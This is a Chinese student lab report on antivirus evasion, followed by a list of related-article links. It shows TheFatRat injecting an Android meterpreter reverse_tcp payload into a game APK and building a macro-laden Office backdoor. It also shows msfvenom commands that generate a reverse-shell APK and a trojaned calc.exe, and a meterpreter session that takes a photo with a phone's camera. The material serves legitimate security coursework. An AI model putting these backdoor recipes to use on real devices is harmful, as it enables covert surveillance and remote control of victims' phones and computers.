20175314薛勐
20175314薛勐

免杀进阶

20175314 2020-4 《网络对抗技术》Exp3Plus 免杀进阶 Week7

目录
  • 20175314 2020-4 《网络对抗技术》Exp3Plus 免杀进阶 Week7
    • 一、实践内容
    • 二、基础知识
      • 安装必要软件包
        • TheFatRat
        • Clamav
      • 预备知识
      • 实践原理
    • 三、实践步骤
      • TheFatRat
        • 自动生成Android后门(apk)
        • 自动生成Office后门(docm)
      • msfvenom

一、实践内容

  • 尝试msfvenom生成jar php apk等文件在其他操作系统如mac linux android的实践应用
  • 尝试自己编写加载、运行、加密任意shellcode的代码。可用python ruby java c#等语言实现。
  • 可以更进一步,将shellcode与放入图片等其他文件,实现提取进行
  • 搜索相关文献并学习实践

二、基础知识

安装必要软件包

TheFatRat

  • 本来在YouTube上发现了一个据说功能强大的工具FatRat
  • 用git从GitHub下载了很久很久,然后还需要安装各种组件

免杀进阶_第1张图片

mark20175314@kalimark:~/20175314Mark/Exp3/Plus$ git clone https://github.com/Screetsec/TheFatRat.git
mark20175314@kalimark:~/20175314Mark/Exp3/Plus$ cd TheFatRat
mark20175314@kalimark:~/20175314Mark/Exp3/Plus$ sudo su
root@kalimark:~/20175314Mark/Exp3/Plus/TheFatRat$ sudo apt install mingw-w64
root@kalimark:~/20175314Mark/Exp3/Plus/TheFatRat$ sudo chmod +x setup.sh
root@kalimark:~/20175314Mark/Exp3/Plus/TheFatRat$ sudo ./setup.sh
root@kalimark:~/20175314Mark/Exp3/Plus/TheFatRat$ chmod +x powerfull.sh
root@kalimark:~/20175314Mark/Exp3/Plus/TheFatRat$ chmod +x fatrat
root@kalimark:~/20175314Mark/Exp3/Plus/TheFatRat$ ./fatrat
 [!]::[Check Dependencies]:
# FatRat运行需要的组件
 [✔]::[Distro]: Kali
 [✔]::[Release]: kali-rolling
 [✔]::[Check User]: root
 [✔]::[Terminal]: local
 [✔]::[Internet Connection]: CONNECTED!
 [✔]::[Apache2 Server Kali ]: Installation found!
 [✔]::[Ruby]: Installation found!
 [✔]::[Apktool]: Installation found!
 [✔]::[Aapt]: Installation found!
 [✔]::[Msfconsole]: Installation found!
 [✔]::[Msfvenom]: Installation found!
 [✔]::[Mingw64]: Installation found!
 [✔]::[Backdoor-factory]: Installation found!
 [✔]::[Monodevelop-Utils]: Installation found!
 [✔]::[Xterm]: Installation found!
 [✔]::[Gnome-terminal]: Installation found!
 [✔]::[Upx]: Installation found!
 [✔]::[Baksmali]: Installation found!
==================================================================                                                 
         WARNING !  WARNING ! WARNING ! WARNING ! WARNING !                                                        
    YOU CAN UPLOAD OUTPUT/BACKDOOR FILE TO WWW.NODISTRIBUTE.COM                                                    
==================================================================                                                 
 ____  _____ _____ _____    _____ _____ __    _____ _____ ____                                                     
|    \|     |   | |_   _|  |  |  |  _  |  |  |     |  _  |    \                                                    
|  |  |  |  | | | | | |    |  |  |   __|  |__|  |  |     |  |  |                                                   
|____/|_____|_|___| |_|    |_____|__|  |_____|_____|__|__|____/                                                    
                         _____ _____                                                                               
                        |_   _|     |                                                                              
                          | | |  |  |                                                                              
                          |_| |_____|                                                                              
 _____ _____ _____ _____ _____    _____ _____ _____ _____ __                                                       
|  |  |     | __  |  |  |   __|  |_   _|     |_   _|  _  |  |                                                      
|  |  |-   -|    -|  |  |__   |    | | |  |  | | | |     |  |__                                                    
 \___/|_____|__|__|_____|_____|    |_| |_____| |_| |__|__|_____|                                                   
==================================================================                                                 
       PLEASE DON'T UPLOAD BACKDOOR TO WWW.VIRUSTOTAL.COM                                                          
    YOU CAN UPLOAD OUTPUT/BACKDOOR FILE TO WWW.NODISTRIBUTE.COM                                                    
==================================================================                                                 
# 一直反复强调不要上传到VirusTotal进行免杀检测,然而它生成的后门程序根本用不了
Press [Enter] key to continue ..............
resize: Time out occurred                                                                                          
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::                                          
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::                                          
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::                                          
                                                                                                                   
   ___________ _   _______________  ___  __  ___  ___  _______  _______                                            
  / __/ __/ _ \ | / /  _/ ___/ __/ / _ \/ / / / |/ / |/ /  _/ |/ / ___/                                            
 _\ \/ _// , _/ |/ // // /__/ _/  / , _/ /_/ /    /    // //    / (_ /                                             
/___/___/_/|_||___/___/\___/___/ /_/|_|\____/_/|_/_/|_/___/_/|_/\___/                                              
                                                                                                                   
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::                                          
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::                                          
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::                                          
Press [Enter] key to Continue...
  • FatRat界面如下图所示,但是可用性还有待验证

免杀进阶_第2张图片

Clamav

# Ubuntu安装Clamav
mark@ubuntu:~$ sudo apt-get install clamav
mark@ubuntu:~$ sudo apt-get install clamav-daemon
mark@ubuntu:~$ sudo freshclam
ERROR: /var/log/clamav/freshclam.log is locked by another process
ERROR: Problem with internal logger (UpdateLogFile = /var/log/clamav/freshclam.log).
ERROR: initialize: libfreshclam init failed.
ERROR: Initialization error!
mark@ubuntu:~$ sudo lsof /var/log/clamav/freshclam.log
lsof: WARNING: can't stat() fuse.gvfsd-fuse file system /run/user/1000/gvfs
      Output information may be incomplete.
COMMAND   PID   USER   FD   TYPE DEVICE SIZE/OFF   NODE NAME
freshclam 931 clamav    3wW  REG    8,1     9004 952317 /var/log/clamav/freshclam.log
mark@ubuntu:~$ sudo systemctl stop clamav-freshclam.service
mark@ubuntu:~$ sudo freshclam
mark@ubuntu:~$ clamscan -r /home # 扫描用户文件夹

预备知识

  • Android系统设备

    • 基于VMware搭建Android虚拟机
    • 智能手机(华为P8)

  • Android系统与Kali系统间的Ping连接方式:PingTools Network Utilities_v4.27.apk

  • Android免杀效果检测方式:华为手机管家

  • Linux免杀效果检测方式:Clamav

实践原理

  • msfvenom生成jar php apk等文件在其他操作系统如mac linux android的实践应用

三、实践步骤

TheFatRat

自动生成Android后门(apk)

        ____                                                                                                      
       |    |                                                                                                     
       |____|                                                                                                     
      _|____|_       _____ _       _____     _   _____     _                                                      
       /  ee\_      |_   _| |_ ___|   __|___| |_| __  |___| |_                                                    
     .<     __O       | | |   | -_|   __| .'|  _|    -| .'|  _|                                                   
    /\ \.-.' \        |_| |_|_|___|__|  |___|_| |__|__|___|_|                                                     
   J  \.|'.\/ \                                                                                                   
   | |_.|. | | |   [--]   Backdoor Creator for Remote Acces [--]                                                  
    \__.' .|-' /   [--]  Created by: Edo Maland (Screetsec) [--]                                                  
    L   /|o'--'\   [--]            Version: 1.9.7           [--]                                                  
    |  /\/\/\   \  [--]          Codename: Whistle          [--]                                                  
    J /      \.__\ [--]   Follow me on Github: @Screetsec   [--]                                                  
    J /      \.__\ [--]   Dracos Linux : @dracos-linux.org  [--]                                                  
    |/         /   [--]                                     [--]                                                  
      \      .'\.  [--]     SELECT AN OPTION TO BEGIN:      [--]                                                  
   ____)_/\_(___\. [--] .___________________________________[--]                                                  
  (___._/  \_.___)'\_.-----------------------------------------/                                                  
                                                                                                                  
                                                                                                                  
       [01]  Create Backdoor with msfvenom                                                                        
       [02]  Create Fud 100% Backdoor with Fudwin 1.0                                                             
       [03]  Create Fud Backdoor with Avoid v1.2                                                                  
       [04]  Create Fud Backdoor with backdoor-factory [embed]                                                    
       [05]  Backdooring Original apk [Instagram, Line,etc]                                                       
       [06]  Create Fud Backdoor 1000% with PwnWinds [Excelent]                                                   
       [07]  Create Backdoor For Office with Microsploit                                                          
       [08]  Trojan Debian Package For Remote Acces [Trodebi]                                                     
       [09]  Load/Create auto listeners                                                                           
       [10]  Jump to msfconsole                                                                                   
       [11]  Searchsploit                                                                                         
       [12]  File Pumper [Increase Your Files Size]                                                               
       [13]  Configure Default Lhost & Lport                                                                      
       [14]  Cleanup                                                                                              
       [15]  Help                                                                                                 
       [16]  Credits                                                                                              
       [17]  Exit                                                                                                 
                                                                                                                  
┌─[TheFatRat]──[~]─[menu]:                                                                                        
└─────► 5
[ ]===========================================================================[ ]
[ ]                                                                           [ ]
[ ]                          )  (         )      )   (    (        )          [ ]   
[ ]   (     (        (     ( /(  )\ )    ( /(   ( /(   )\ ) )\ )  ( /(  (     [ ]   
[ ]   )\    )\       )\    )\())(()/(    )\())  )\()) (()/((()/(  )\()) )\ )  [ ]   
[ ]  ((_)((((_)(   (((_) |((_)\  /(_))  ((_)\  ((_)\   /(_))/(_))((_)\ (()/(  [ ]   
[ ]  (_)   )\_ )\  )\___ |_ ((_)(_))_   ((_)   ((_)   (_)) (_))  _((_) /(_))_ [ ]  
[ ] | _ ) (_)_\(_)((/ __|| |/ /  |   \  / _ \  / _ \ | _ \|_ _| | \| |(_)) __|[ ] 
[ ] | _ \  / _ \   | (__   ' <   | |) || (_) || (_) ||   / | |  | .` |  | (_ |[ ] 
[ ] |___/ /_/ \_\   \___| _|\_\  |___/  \___/  \___/ |_|_\|___| |_|\_|   \___|[ ]
[ ]===========================================================================[ ]
[ ]            Embed a Metasploit Payload in an original .apk files           [ ]
[ ] This script is POC for injecting metasploit payload arbitary apk backdoor [ ]
[ ]===========================================================================[ ]

Cleaning Temp files
Done!

  Your local IPV4 address is : 192.168.40.130
  Your local IPV6 address is : fe80::20c:29ff:fe77:c759
  Your public IP address is : 220.250.44.51
  Your Hostname is : 3(NXDOMAIN
      
       Set LHOST IP: 192.168.40.130

 Set LPORT: 5314

Enter the path to your android app/game .(ex: /root/downloads/myapp.apk)

Path : /home/mark20175314/20175314Mark/Exp3/Plus/MarkWechat.apk                                                   


  +-------------------------------------------+
  | [ 1 ] android/meterpreter/reverse_http    |                                                                   
  | [ 2 ] android/meterpreter/reverse_https   |                                                                   
  | [ 3 ] android/meterpreter/reverse_tcp     |                                                                   
  | [ 4 ] android/shell/reverse_http          |                                                                   
  | [ 5 ] android/shell/reverse_https         |                                                                   
  | [ 6 ] android/shell/reverse_tcp           |                                                                   
  +-------------------------------------------+
                                                                                                                  
  Choose Payload : 3                                                                                              

[ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]
+------------------------------+
| [ 1 ] Use Backdoor-apk 0.2.4a |                                                                                 
| [ 2 ] Use old Fatrat method  |                                                                                  
+------------------------------+                                                                                  
                                                                                                                  
Select Tool to create apk : 1                                                                                     

[ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]$ 
 Generate Backdoor
 +------------++-------------------------++-----------------------+
 | Name       ||  Descript               || Your Input
 +------------++-------------------------++-----------------------+
 | LHOST      ||  The Listen Addres      || 192.168.40.130
 | LPORT      ||  The Listen Ports       || 5314
 | OUTPUTNAME ||  The Filename output    || app_backdoor.apk
 | PAYLOAD    ||  Payload To Be Used     || android/meterpreter/reverse_tcp
 +------------++-------------------------++-----------------------+

         ________
        / ______ \
        || _  _ ||
        ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
        |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
        || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
        ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
        |||_||_|||         AAA  AAA  PPP       KKK  KKK
        ||______||         AAA  AAA  PPP       KKK  KKK
       /__________\
________|__________|__________________________________________
      /____________\
      |____________|            Dana James Traversie

[*] Running backdoor-apk.sh v0.2.4a on 2020年 04月 04日 星期六 20:21:25 CST
[+] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffle
[?] Please select an Android manifest permission option: 1
[*] Decompiling original APK file...done.
[*] Locating smali file to hook in original project...done.
[+] Package where RAT smali files will be injected: com/tencent/mm
[+] Smali file to hook RAT payload: com/tencent/mm/app/Application.smali
[*] Generating RAT APK file...done.
[*] Decompiling RAT APK file...done.
[+] Keeping permissions of original project
[*] Injecting helpful Java classes in RAT APK file...done.
[*] Creating new directory in original package for RAT smali files...done.
[+] Inject package path: com/tencent/mm/hdwrs
[+] Generated new smali class name for MainBroadcastReceiver.smali: Zipbe
[+] Generated new smali class name for MainService.smali: Ommig
[+] Generated new smali class name for Payload.smali: Bbful
[+] Generated new smali class name for StringObfuscator.smali: Kxuho
[+] Generated new smali method name for StringObfuscator.obfuscate method: skscn
[+] Generated new smali method name for StringObfuscator.unobfuscate method: yanvs
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Adding hook in original smali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[!] Failed to recompile original project with backdoor

Press [ENTER] key to continue to return to fatrat menu
  • 这里显示失败了,然后我重复步骤选择Merge with payload and shuffle但还是失败了
  • 我一开始觉得可能是微信版本比较新的原因,于是我又下载了6.0的老版本但最后还是失败了
  • 最后我找了一个2048小游戏的安装包,选择Use old Fatrat method成功
[ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++   ]
 +------------------------------+
 | [ 1 ] Use Backdoor-apk 0.2.4a |                                                                                 
 | [ 2 ] Use old Fatrat method  |                                                                                  
 +------------------------------+                                                                                  
                                                                                                                   
 Select Tool to create apk : 2                                                                                     
 
                                                                                                                                                                                                                                
[ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++    ]$                                         
  Generate Backdoor
  +------------++-------------------------++-----------------------+
  | Name       ||  Descript               || Your Input
  +------------++-------------------------++-----------------------+
  | LHOST      ||  The Listen Addres      || 192.168.40.130
  | LPORT      ||  The Listen Ports       || 5314
  | OUTPUTNAME ||  The Filename output    || app_backdoored.apk
  | PAYLOAD    ||  Payload To Be Used     || android/meterpreter/reverse_tcp
  +------------++-------------------------++-----------------------+

[*] Creating RAT payload with msfvenom                                                                             
[✔] Done!                                                                                                          
[*] Creating a Valid Certificate                                                                                   
[✔] Done!                                                                                                          
[*] Starting the merging process of RAT with the APK you selected                                                  
                                                                                                                   
ruby: warning: shebang line ending with \r may cause problems                                                      
[*] Signing payload..                                                                                              
[*] Decompiling original APK..                                                                                     
S: WARNING: Could not write to (/root/.local/share/apktool/framework), using /tmp instead...                       
S: Please be aware this is a volatile directory and frameworks could go missing, please utilize --frame-path if the default storage directory is unavailable                                                                          
[*] Decompiling payload APK..                                                                                      
S: WARNING: Could not write to (/root/.local/share/apktool/framework), using /tmp instead...                       
S: Please be aware this is a volatile directory and frameworks could go missing, please utilize --frame-path if the default storage directory is unavailable                                                                          
[*] Locating onCreate() hook..                                                                                     
[*] Copying payload files..                                                                                        
[*] Loading temp/original/smali/com/bxstudio/game2048/game2048.smali and injecting payload..                       
[*] Poisoning the manifest with meterpreter permissions..                                                          
[*] Adding android.permission.ACCESS_WIFI_STATE                                                                    
[*] Adding android.permission.CHANGE_WIFI_STATE                                                                    
[*] Adding android.permission.ACCESS_NETWORK_STATE                                                                 
[*] Adding android.permission.ACCESS_COARSE_LOCATION                                                               
[*] Adding android.permission.ACCESS_FINE_LOCATION                                                                 
[*] Adding android.permission.READ_PHONE_STATE                                                                     
[*] Adding android.permission.SEND_SMS                                                                             
[*] Adding android.permission.RECEIVE_SMS                                                                          
[*] Adding android.permission.RECORD_AUDIO                                                                         
[*] Adding android.permission.CALL_PHONE                                                                           
[*] Adding android.permission.READ_CONTACTS                                                                        
[*] Adding android.permission.WRITE_CONTACTS                                                                       
[*] Adding android.permission.RECORD_AUDIO                                                                         
[*] Adding android.permission.WRITE_SETTINGS                                                                       
[*] Adding android.permission.CAMERA                                                                               
[*] Adding android.permission.READ_SMS                                                                             
[*] Adding android.permission.WRITE_EXTERNAL_STORAGE                                                               
[*] Adding android.permission.RECEIVE_BOOT_COMPLETED                                                               
[*] Adding android.permission.SET_WALLPAPER                                                                        
[*] Adding android.permission.READ_CALL_LOG                                                                        
[*] Adding android.permission.WRITE_CALL_LOG                                                                       
[*] Adding android.permission.WAKE_LOCK                                                                            
[*] Rebuilding /home/mark20175314/20175314Mark/Exp3/Plus/TheFatRat/temp/app.apk with meterpreter injection as /home/mark20175314/20175314Mark/Exp3/Plus/TheFatRat/temp/app_backdoored.apk..                                           
S: WARNING: Could not write to (/root/.local/share/apktool/framework), using /tmp instead...                       
S: Please be aware this is a volatile directory and frameworks could go missing, please utilize --frame-path if the default storage directory is unavailable                                                                          
[+] Infected file /home/mark20175314/20175314Mark/Exp3/Plus/TheFatRat/temp/app_backdoored.apk ready.               
                                                                                                                   
[✔] Done!                                                                                                          
[*] Signing your Rat APK                                                                                           
[✔] Done!                                                                                                          
                                                                                                                   
[!] FatRat Detected that you already had a previous created backdoor                                               
file in (/root/Fatrat_Generated/) with the name app_backdoored.apk .                                               
                                                                                                                   
[✔] FatRat have renamed your old backdoor to app_backdoored_927.apk                                                
                                                                                                                   
Your payload has been successfully & signed and it is located at :                                                 
 /root/Fatrat_Generated/app_backdoored.apk                                                                         
                                                                                                                   
[*] Removing temporary files                                                                                       
[✔] Done!                                                                                                          
                                                                                                                   
 Do you want to create a listener for this configuration                                                           
 to use in msfconsole in future ?                                                                                  
                                                                                                                   
 Choose y/n : y                                                                                                    
                                                                                                                   
 Write the name for this config . (ex : myratapk)                                                                  
Filename : mark2048.apk                                                                                            
 
Configuration file saved to /home/mark20175314/20175314Mark/Exp3/Plus/TheFatRat/config/listeners/mark2048.apk.rc
  • 下面根据提示将重新编译的后门程序从最需要权限的root目录中取出
  • 重新打开一个终端将后门程序复制到我们的实验文件夹下
mark20175314@kalimark:/$ sudo su
root@kalimark:/# cd root
root@kalimark:~# cd Fatrat_Generated
root@kalimark:~/Fatrat_Generated# ls
app_backdoored_927.apk  app_backdoored.apk
root@kalimark:~/Fatrat_Generated# cp app_backdoored.apk /home/mark20175314/20175314Mark/Exp3/Plus/mark2048.apk
  • 然后就把后门程序安装到目标安卓机器上但是程序能够正常运行玩2048小游戏而且打开监听没有反应
  • 经过多次尝试后我选择放弃这个方法

自动生成Office后门(docm)

  <==============================================>
  ||  _____ _             _____     _     _ _    ||
  || |     |_|___ ___ ___|   __|___| |___|_| |_  ||
  || | | | | |  _|  _| . |__   | . | | . | |  _| ||
  || |_|_|_|_|___|_| |___|_____|  _|_|___|_|_|   ||
  ||                           | |               ||
  <===================================================>
        ||   |=| Microsfot Metasploit Packet [ Easy ] ||
        ||   |=| Version : 1.0.0                      ||
        ||   |=| Code by : Screetsec - Edo Malad      || 
        ||   |=| Codename: Mario Bros                 || 
        ||============================================||

  |1| Microsoft Stack overflow in MSCOMCTL.OCX
  |2| The Microsoft Office Macro on Windows 
  |3| The Microsoft Office Macro on Mac OS X 
  |4| Apache OpenOffice on Windows (PSH)
  |5| Apache OpenOffice on Linux/OSX (Python)
  |6| Exit

 ┌─[TheFatRat]──[~]─[microsploit]:
 └─────► 2

   Worked on Microsoft Office on Windows  

   Your local IPV4 address is : 192.168.40.130
   Your local IPV6 address is : fe80::20c:29ff:fe77:c759
   Your public IP address is : 220.250.44.51
   Your Hostname is : 3(NXDOMAIN

   Set LHOST IP: 192.168.40.130
 
   Set LPORT: 5314

   Enter the base name for output files : markoffice

   Enter the message for the document body (ENTER = default) : 

   Are u want Use custom exe file backdoor ( y/n ): y

 Enter the path to your EXE file .(ex: /root/downloads/myfile.exe)

 Path : /home/mark20175314/20175314Mark/Exp3/Plus/win32calc.exe

   +-------------------------------------------+
   | [ 1 ] windows/shell_bind_tcp              |                                                                   
   | [ 2 ] windows/shell/reverse_tcp           |                                                                   
   | [ 3 ] windows/meterpreter/reverse_tcp     |                                                                   
   | [ 4 ] windows/meterpreter/reverse_tcp_dns |                                                                   
   | [ 5 ] windows/meterpreter/reverse_http    |                                                                   
   | [ 6 ] windows/meterpreter/reverse_https   |                                                                   
   +-------------------------------------------+                                                                   
                                                                                                                   
   Choose Payload :3                                                                                               


[ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  ]

 
  Generate Backdoor                                                                                                
  +------------++-------------------------++-----------------------+                                               
  | Name       ||  Descript               || Your Input                                                            
  +------------++-------------------------++-----------------------+                                               
  | LHOST      ||  The Listen Addres      || 192.168.40.130                                                        
  | LPORT      ||  The Listen Ports       || 5314                                                                  
  | OUTPUTNAME ||  The Filename output    || markoffice                                                            
  | PAYLOAD    ||  Payload To Be Used     || windows/meterpreter/reverse_tcp                                       
  +------------++-------------------------++-----------------------+                                               
                                                                                                                   
                                                                                                                                                                                                                                                                                        
[ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++     ]                                          


  Backdoor doc Saved To : /home/mark20175314/20175314Mark/Exp3/Plus/thefatrat/output/markoffice.docm

免杀进阶_第3张图片

  • 即使没有开启杀软,加入宏的docm文件在纯粹的Microsoft Office面前植入就遭到了重重困难
  • 并且在反弹连接上又不出意外地没有反应,FatRat尝试失败(原因未知)

msfvenom

  • 自动化工具尝试失败后回归原始的msfvenom指令比较顺利
  • 切换Kali的网络设置为桥接,Android与Kali互相可以Ping通
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.101 lport=5314 R > marktest.apk
msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.101
lhost => 192.168.1.101
msf5 exploit(multi/handler) > set LPORT 5314
LPORT => 5314
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (android/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.101    yes       The listen address (an interface may be specified)
   LPORT  5314             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.101:5314 
[*] Sending stage (73548 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.101:5314 -> 192.168.1.106:59619) at 2020-04-05 23:13:04 +0800

meterpreter > sysinfo # 查看系统信息
Computer    : localhost
OS          : Android 6.0 - Linux 3.10.86-gfbb1a67 (aarch64)
Meterpreter : dalvik/android
meterpreter > check_root # 查看系统是否root
[*] Device is not rooted
meterpreter > webcam_stream
[*] Starting...
[*] Preparing player...
[*] Opening player at: /home/mark20175314/20175314Mark/Exp3/Plus/SRrZcztL.html
[*] Streaming...
[2165:2165:0405/231532.445219:ERROR:zygote_host_impl_linux.cc(89)] Running as root without --no-sandbox is not supported. See https://crbug.com/638180.
[-] webcam_get_frame: Operation failed: 1
meterpreter > screenshot
[-] No screenshot data was returned.
[-] With Android, the screenshot command can only capture the host application. If this payload is hosted in an app without a user interface (default behavior), it cannot take screenshots at all.
meterpreter > 
[*] 192.168.1.106 - Meterpreter session 1 closed.  Reason: Died
meterpreter > webcam_list
1: Back Camera
2: Front Camera
meterpreter > webcam_snap -i 1 # 这里选择BackCamera即后置摄像头进行拍摄,画质感人并且经过多次测试,如果机器本身在使用这个摄像头,那么后门程序就没有办法进行调用
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /home/mark20175314/20175314Mark/Exp3/Plus/UqfGeQvt.jpeg

免杀进阶_第4张图片

  • 过程很流畅,但是如果FatRat在上面步骤中功能可以如期实现的话实际效果要比后来的方式更好
  • FatRat能够反编译原来的apk文件加入paylord后再重新编译,原理与实验一相似因此也更加实用
  • 而后来的步骤中用msfvenom指令直接生成的apk文件即使没有杀毒软件检测,对于用户来说也不会去主动选择安装和运行这个程序,更不可能实现反弹连接和后门攻击
  • 因为FatRat只是MSF的自动化工具箱,所以原始的msfvenom指令也可以通过模板生成后门程序

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.40.130 LPORT=5314 -x calc.exe -k -f exe > markcalc.exe

  • 实验三中我尝试过用以上指令用calc.exe(计算器)为模板注入paylord,并因为加入了-k参数保留了计算器的原有功能

你可能感兴趣的:(免杀进阶)

  • C语言【基础篇】之函数——开启模块化开发的钥匙 EnigmaCoder cc语言开发语言学习
    目录前言函数基础什么是函数?函数的语法结构函数的声明与定义头文件(.h)与源文件(.c)的分工为什么需要函数原型?️参数传递机制值传递vs.指针传递修改外部变量的方法返回值与void类型如何返回多个值无返回值函数的应用场景函数进阶⚙️递归函数递归原理与终止条件递归的优缺点✍️函数指针定义与赋值应用场景‍函数的作用域与生命周期变量的作用域规则static关键字的作用头文件与多文件编程#ifndef方
  • 【卡车无人机】遗传算法GA求解卡车联合无人机配送路径规划【含Matlab源码 XYDG001期】 Matlab领域 Matlab路径规划(高阶版)matlab
    Matlab领域博客之家博主简介:985研究生,Matlab领域科研开发者;个人主页:Matlab领域代码获取方式:CSDNMatlab领域—代码获取方式座右铭:路漫漫其修远兮,吾将上下而求索。更多Matlab路径规划仿真内容点击①Matlab路径规划(高阶版)②付费专栏Matlab路径规划(进阶版)③付费专栏Matlab路径规划(初级版)⛳️关注CSDNMatlab领域,更多资源等你来!!⛄一、
  • Git进阶教程 麦秸垛的守望者 GitGit
    文章目录写在前面版本回退查看版本回退操作git两种鉴权方式(sshhttp)git分支操作实际操作git冲突的产生与解决冲突的产生解决冲突忽略文件推荐几款GUI工具后文写在前面我们之前写过一篇git基础操作的文章,有人说写的太简单了,工作中很多用到的都没有写,那么今天我把剩下的git的一些基本操作也梳理了一下,分享给你们,鄙人能力有限,写的哪里不对的或者不严谨的,随时私信我,我及时更新。然后就是如
  • 开发工具篇第二讲:git使用技巧 从基础到进阶(快速入门/高阶用法/git别名/项目实战/gitLab) 程序员 jet_qi 常用开发工具gitjavarebasecherry-pick
    git是一个开源的分布式版本控制系统,可以有效高速地处理从很小到非常大的项目版本管理。它是LinusTorvalds为了帮助管理Linux内核开发而开发的一个开放源码的版本控制软件,git作为版本管理工具,程序员是必须要掌握的。本文是开发工具篇第二讲:主要介绍了git的常规使用方法及在日常开发实战场景中git的应用。文章目录1、认识git2、git原理2.1、git与其他版本管理系统的主要区别2.
  • 提示工程(Prompt Engineering)的进阶策略与实践指南 调皮的芋头 prompt机器学习人工智能
    深化与细化:提示工程(PromptEngineering)的进阶策略与实践指南一、结构化提示的黄金框架CRISPE框架(角色-约束-意图-风格-示例)适用于复杂技术场景,确保输出精准可控:[角色]你是一名有10年经验的Java架构师[约束]使用SpringSecurity6.0+,兼容JDK17[意图]实现支持JWT和OAuth2协议的用户鉴权模块[风格]代码符合GoogleJavaStyle,包
  • Git 从入门到进阶 (只有干货,没有废话) 2401_84153158 程序员gitelasticsearch大数据
    《一线大厂Java面试题解析+核心总结学习笔记+最新讲解视频+实战项目源码》,点击传送门,即可获取!1.2.2已有的项目gitstash保存当前修改gitpull拉取远程最新代码与本地合并gitstashpop取出当前最新修改gitadd文件列表追踪文件gitcommit-m提交信息向仓库提交代码gitpushorigin分支名称推送至远程仓库具体的分支二、Git进阶操作=============
  • Git 深度解析 —— 从基础到进阶 Exhausted、 gitelasticsearch大数据搜索引擎git
    目录1.Git基础概念1.1版本控制(VersionControl)1.2分布式版本控制(DistributedVersionControl)1.3核心概念1.4Git工作流程2.Git常用命令2.1初始化仓库2.2添加文件2.3提交修改2.4查看状态2.5查看历史记录2.6切换分支2.7创建分支2.8合并分支2.9克隆仓库2.10推送修改2.11拉取更新3.Git进阶技巧3.1Git撤销操作3.
  • 大规模GPU集群的进阶之路 卢旗 人工智能
    大家好,我是卢旗。今天来聊聊GPU。GPU,全称GraphicProcessingUnit,即图形处理器。它的并行处理能力非常强大,能够同时处理多个任务和数据,因此被广泛用于图形渲染、视频处理、深度学习、科学计算等领域。研发团队在负责制定硬件选型策略并设计优化下一代大规模GPU集群的软硬件架构时,我们需要关注GPU技术的最新进展、重点研究问题以及潜在的技术突破。一、GPU在重点研究的问题算力提升与
  • 深度揭秘 DeepSeek:2025 最新版,带你从 0 基础到熟练运用 小白教程 AI写作人工智能AIGC
    文章目录前言一、deepseek使用技巧大全下载二、使用步骤1.准备篇:快速上手DeepSeekAI平台2.基础对话篇:有效提问与魔法指令3.效率飞跃篇:文件处理与代码生成4.场景实战篇:解决真实世界问题5.高手进化篇:专业生产力工具6.自我学习能力提升7.编程教练篇:代码入门与面试准备8.创作进阶篇:小说创作与视频脚本总结前言这是一篇关于DeepSeekAI平台使用指南的文章,主要介绍了从注册到
  • 2025年网络安全(黑客技术)三个月自学手册 csbDD web安全安全网络pythonlinux网络安全密码学
    基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包前言什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。如何成为一名黑客很多朋友在学习安全方面都会半路转行,因为不知如何去学,在这里,我将这个整份答案分为黑客(网络安全)入门必备、黑客(网络安全)职业指南、黑客(网络安全)学习
  • 2024年网络安全(黑客技术)三个月自学手册 csbDD web安全安全网络
    基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包前言什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。如何成为一名黑客很多朋友在学习安全方面都会半路转行,因为不知如何去学,在这里,我将这个整份答案分为黑客(网络安全)入门必备、黑客(网络安全)职业指南、黑客(网络安全)学习
  • 2024年网络安全(黑客技术)三个月自学手册 csbDD web安全安全网络
